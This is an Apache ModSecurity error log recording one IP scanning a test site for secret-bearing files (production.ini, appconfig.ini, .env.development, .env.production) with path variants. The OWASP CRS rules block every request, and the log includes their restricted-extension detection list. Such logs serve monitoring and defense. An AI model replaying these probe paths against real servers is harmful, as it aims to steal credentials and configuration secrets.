[Fri Jan 16 03:16:10.199183 2026] [:error] [pid 1444032] [client 45.148.10.246:46300] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production.ini"] [unique_id "aWmfaukMvq8uPO2ZciWpTgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//production.ini
[Fri Jan 16 03:16:10.199374 2026] [:error] [pid 1444032] [client 45.148.10.246:46300] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production.ini"] [unique_id "aWmfaukMvq8uPO2ZciWpTgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//production.ini
[Fri Jan 16 03:16:10.367966 2026] [:error] [pid 1444226] [client 45.148.10.246:46308] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production.ini"] [unique_id "aWmfamcpoCUgeFICb0bdqgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./production.ini
[Fri Jan 16 03:16:10.368301 2026] [:error] [pid 1444226] [client 45.148.10.246:46308] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production.ini"] [unique_id "aWmfamcpoCUgeFICb0bdqgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./production.ini
[Fri Jan 16 03:16:10.368450 2026] [:error] [pid 1444226] [client 45.148.10.246:46308] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production.ini"] [unique_id "aWmfamcpoCUgeFICb0bdqgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./production.ini
[Fri Jan 16 03:16:11.191597 2026] [:error] [pid 1444032] [client 45.148.10.246:46368] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/applications/init/private/appconfig.ini"] [unique_id "aWmfa-kMvq8uPO2ZciWpTwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/applications/init/private/appconfig.ini
[Fri Jan 16 03:16:11.192003 2026] [:error] [pid 1444032] [client 45.148.10.246:46368] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/applications/init/private/appconfig.ini"] [unique_id "aWmfa-kMvq8uPO2ZciWpTwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/applications/init/private/appconfig.ini
[Fri Jan 16 03:16:11.192205 2026] [:error] [pid 1444032] [client 45.148.10.246:46368] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/applications/init/private/appconfig.ini"] [unique_id "aWmfa-kMvq8uPO2ZciWpTwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/applications/init/private/appconfig.ini
[Fri Jan 16 03:16:11.562487 2026] [:error] [pid 1444035] [client 45.148.10.246:46382] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/applications/init/private/appconfig.ini"] [unique_id "aWmfa7auW6yeGWXfDeFWuAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//applications/init/private/appconfig.ini
[Fri Jan 16 03:16:11.563952 2026] [:error] [pid 1444035] [client 45.148.10.246:46382] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/applications/init/private/appconfig.ini"] [unique_id "aWmfa7auW6yeGWXfDeFWuAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//applications/init/private/appconfig.ini
[Fri Jan 16 03:16:11.564131 2026] [:error] [pid 1444035] [client 45.148.10.246:46382] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/applications/init/private/appconfig.ini"] [unique_id "aWmfa7auW6yeGWXfDeFWuAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//applications/init/private/appconfig.ini
[Fri Jan 16 03:16:11.716132 2026] [:error] [pid 1444031] [client 45.148.10.246:46384] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/applications/init/private/appconfig.ini"] [unique_id "aWmfa3-9MmrgwjmYTAJRagAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./applications/init/private/appconfig.ini
[Fri Jan 16 03:16:11.716656 2026] [:error] [pid 1444031] [client 45.148.10.246:46384] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/applications/init/private/appconfig.ini"] [unique_id "aWmfa3-9MmrgwjmYTAJRagAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./applications/init/private/appconfig.ini
[Fri Jan 16 03:16:11.716818 2026] [:error] [pid 1444031] [client 45.148.10.246:46384] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/applications/init/private/appconfig.ini"] [unique_id "aWmfa3-9MmrgwjmYTAJRagAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./applications/init/private/appconfig.ini
[Fri Jan 16 03:16:27.244641 2026] [:error] [pid 1444032] [client 45.148.10.246:50274] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWmfe-kMvq8uPO2ZciWpXgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.development
[Fri Jan 16 03:16:27.244869 2026] [:error] [pid 1444032] [client 45.148.10.246:50274] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWmfe-kMvq8uPO2ZciWpXgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.development
[Fri Jan 16 03:16:27.245040 2026] [:error] [pid 1444032] [client 45.148.10.246:50274] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWmfe-kMvq8uPO2ZciWpXgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.development
[Fri Jan 16 03:16:27.379648 2026] [:error] [pid 1444226] [client 45.148.10.246:50276] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development/"] [unique_id "aWmfe2cpoCUgeFICb0bdugAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.development/
[Fri Jan 16 03:16:27.379907 2026] [:error] [pid 1444226] [client 45.148.10.246:50276] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development/"] [unique_id "aWmfe2cpoCUgeFICb0bdugAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.development/
[Fri Jan 16 03:16:27.380103 2026] [:error] [pid 1444226] [client 45.148.10.246:50276] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development/"] [unique_id "aWmfe2cpoCUgeFICb0bdugAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.development/
[Fri Jan 16 03:16:27.516368 2026] [:error] [pid 1444040] [client 45.148.10.246:50282] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWmfe_n_5sIyKhJ5GAzY2AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.development
[Fri Jan 16 03:16:27.516608 2026] [:error] [pid 1444040] [client 45.148.10.246:50282] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWmfe_n_5sIyKhJ5GAzY2AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.development
[Fri Jan 16 03:16:27.516779 2026] [:error] [pid 1444040] [client 45.148.10.246:50282] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWmfe_n_5sIyKhJ5GAzY2AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.development
[Fri Jan 16 03:16:27.681918 2026] [:error] [pid 1444035] [client 45.148.10.246:50290] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWmfe7auW6yeGWXfDeFWxgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.development
[Fri Jan 16 03:16:27.682144 2026] [:error] [pid 1444035] [client 45.148.10.246:50290] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWmfe7auW6yeGWXfDeFWxgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.development
[Fri Jan 16 03:16:27.682297 2026] [:error] [pid 1444035] [client 45.148.10.246:50290] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWmfe7auW6yeGWXfDeFWxgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.development
[Fri Jan 16 03:16:27.883827 2026] [:error] [pid 1444033] [client 45.148.10.246:50296] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWmfe9LJkp65ULFQ2YYhaAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.production
[Fri Jan 16 03:16:27.884055 2026] [:error] [pid 1444033] [client 45.148.10.246:50296] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWmfe9LJkp65ULFQ2YYhaAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.production
[Fri Jan 16 03:16:27.884215 2026] [:error] [pid 1444033] [client 45.148.10.246:50296] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWmfe9LJkp65ULFQ2YYhaAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.production
[Fri Jan 16 03:16:28.059961 2026] [:error] [pid 1444034] [client 45.148.10.246:50302] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production/"] [unique_id "aWmffORfEYyDES-ZFL4hXAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.production/
[Fri Jan 16 03:16:28.060182 2026] [:error] [pid 1444034] [client 45.148.10.246:50302] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production/"] [unique_id "aWmffORfEYyDES-ZFL4hXAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.production/
[Fri Jan 16 03:16:28.060341 2026] [:error] [pid 1444034] [client 45.148.10.246:50302] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production/"] [unique_id "aWmffORfEYyDES-ZFL4hXAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.production/
[Fri Jan 16 03:16:28.192281 2026] [:error] [pid 1444032] [client 45.148.10.246:50312] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWmffOkMvq8uPO2ZciWpXwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.production
[Fri Jan 16 03:16:28.192528 2026] [:error] [pid 1444032] [client 45.148.10.246:50312] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWmffOkMvq8uPO2ZciWpXwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.production
[Fri Jan 16 03:16:28.192697 2026] [:error] [pid 1444032] [client 45.148.10.246:50312] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWmffOkMvq8uPO2ZciWpXwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.production
